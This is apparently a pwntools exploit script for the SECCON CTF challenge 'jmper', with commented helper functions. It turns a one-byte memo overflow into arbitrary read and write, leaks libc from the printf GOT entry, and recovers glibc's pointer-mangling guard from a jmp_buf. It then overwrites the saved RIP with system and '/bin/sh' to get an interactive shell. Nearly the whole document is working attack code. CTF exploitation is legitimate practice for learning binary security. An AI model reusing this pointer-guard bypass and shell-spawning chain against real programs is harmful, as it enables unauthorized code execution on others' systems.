| from pwn import * | |
# Target setup. Passing REMOTE on the command line selects the contest
# service together with the libc that shipped with it; otherwise a local
# instance on port 4000 is used and the ELF's own libc is resolved.
context.arch = "amd64"
elf = ELF("./jmper")

if args["REMOTE"]:
    HOST, PORT = "jmper.pwn.seccon.jp", 5656
    libc = ELF("./libc-2.19.so")
else:
    HOST, PORT = "localhost", 4000
    libc = elf.libc

# Single connection shared by every helper below.
r = remote(HOST, PORT)
def addr_pad(addr):
    """Decode a possibly short little-endian byte string as a u64.

    *addr* is zero-padded on the right to at least 8 bytes and the first
    8 bytes are unpacked, so a partial leak still decodes.
    """
    padded = addr + "\x00" * 8
    return u64(padded[:8])
def add_student():
    """Select menu option 1 (add a student) once the ":)" prompt appears."""
    r.recvuntil(":)\n")
    r.writeline("1")
def write_name(idx, name):
    """Select menu option 2 and set the name of student *idx* to *name*.

    Each prompt is awaited before its answer is sent so the dialogue stays
    in step with the service.
    """
    dialogue = (
        (":)\n", "2"),
        ("ID:", str(idx)),
        ("Input name:", name),
    )
    for prompt, answer in dialogue:
        r.recvuntil(prompt)
        r.writeline(answer)
def write_memo(idx, memo):
    """Select menu option 3 and set the memo of student *idx* to *memo*.

    Each prompt is awaited before its answer is sent so the dialogue stays
    in step with the service.
    """
    dialogue = (
        (":)\n", "3"),
        ("ID:", str(idx)),
        ("Input memo:", memo),
    )
    for prompt, answer in dialogue:
        r.recvuntil(prompt)
        r.writeline(answer)
def show_name(idx):
    """Select menu option 4 and return the name stored for student *idx*.

    The service prints the name followed by the menu again; everything up
    to the next "1." menu line is taken and the "1." itself is trimmed.
    """
    r.recvuntil(":)\n")
    r.writeline("4")
    r.recvuntil("ID:")
    r.writeline(str(idx))
    reply = r.recvuntil("1.")
    return reply[:-2]
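def show_memo(idx):
    """Select menu option 5 and return the memo stored for student *idx*.

    Waits for the ":)" prompt like the other menu helpers. The original
    called ``r.recv(":)\\n")``, which passes a string where ``recv`` expects
    a byte count and does not wait for the prompt at all, so menu text
    could end up in the returned memo or the call could fail outright.

    The service prints the memo followed by the menu again; everything up
    to the next "1." menu line is taken and the "1." itself is trimmed.
    """
    r.recvuntil(":)\n")  # was r.recv(":)\n"): wrong method for a prompt string
    r.writeline("5")
    r.recvuntil("ID:")
    r.writeline(str(idx))
    reply = r.recvuntil("1.")
    return reply[:-2]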
def leak_name_addr(idx):
    """Fill student *idx*'s memo with 32 filler bytes and decode what follows.

    After the memo is read back, the bytes after the 32-byte filler are
    interpreted as a little-endian pointer via ``addr_pad``. Not used by
    the main flow below.
    """
    filler = "A" * 32
    write_memo(idx, filler)
    trailing = show_memo(idx)[len(filler):]
    return addr_pad(trailing)
def patch_lowest_byte(idx, byte):
    """Write 32 filler bytes plus one extra byte into student *idx*'s memo.

    The 33rd byte is the interesting one: judging by the name, the memo
    field is 32 bytes wide and this byte lands on the lowest byte of
    whatever follows it in memory (inferred from the name; the layout is
    not visible here).
    """
    payload = "A" * 32 + chr(byte)
    write_memo(idx, payload)
def read(addr):
    """Return the raw bytes the service prints for student 1 after storing
    the packed *addr* as student 0's name.

    Shadows the builtin ``read``; kept for compatibility with callers.
    """
    write_name(0, p64(addr))
    return show_name(1)
def read_addr(addr):
    """Like ``read`` but decode the result as a u64, zero-padding short output."""
    raw = read(addr)
    return u64(raw.ljust(8, "\x00"))
def write(addr, value):
    """Store the packed *addr* as student 0's name, then *value* as student 1's name."""
    write_name(0, p64(addr))
    write_name(1, value)
def mangle_ptr(p, k):
    """Apply glibc's x86-64 PTR_MANGLE to pointer *p* with guard *k*.

    The scheme is XOR with the guard followed by a rotate-left by 17 bits
    (``rol`` uses the 64-bit word size set via ``context.arch``).
    """
    xored = p ^ k
    return rol(xored, 17)
def demangle_ptr(p, k):
    """Undo ``mangle_ptr``: rotate-right by 17 bits, then XOR with *k*.

    Because XOR is its own inverse, passing a known plaintext pointer as
    *k* returns the guard value instead; the main flow relies on that.
    """
    rotated = ror(p, 17)
    return rotated ^ k
# Main flow.
#
# Offset of the saved RIP slot inside the jmp_buf (per the glibc x86-64
# layout used by this script).
rip_offset = 0x38

# Two records are needed: slot 0 carries the address, slot 1 is read/written.
add_student()
add_student()
# One-byte overwrite on slot 0's memo; see patch_lowest_byte for the caveat.
patch_lowest_byte(0, 0x78)

# Resolve libc from the printf GOT entry.
printf_addr = read_addr(elf.got["printf"])
libc_base = printf_addr - libc.symbols["printf"]
system_addr = libc_base + libc.symbols["system"]
log.info("libc leak: %x" % libc_base)

# Locate the jmp_buf and recover the pointer guard. The guard falls out
# because the unmangled saved RIP is a known, fixed code address: PTR_MANGLE
# only defends against blind overwrites, not against an attacker who already
# has an arbitrary read -- a useful reminder when assessing this mitigation.
jmpbuf_addr = read_addr(elf.symbols["jmpbuf"])
log.info("heap? %x" % jmpbuf_addr)
mangled_rip = read_addr(jmpbuf_addr + rip_offset)
orig_rip = 0x400c31
xor_key = demangle_ptr(mangled_rip, orig_rip)

# Re-mangle the replacement target with the recovered guard and place the
# argument string at the start of the buffer.
new_rip = mangle_ptr(system_addr, xor_key)
write(jmpbuf_addr + rip_offset, p64(new_rip))
write(jmpbuf_addr, "/bin/sh\x00")
log.info("RIP: %x, RDI: %x" % (system_addr, jmpbuf_addr))

# Filling the remaining slots is what makes the service take the longjmp path.
for _ in range(29):
    add_student()
_ = r.recv()
r.interactive()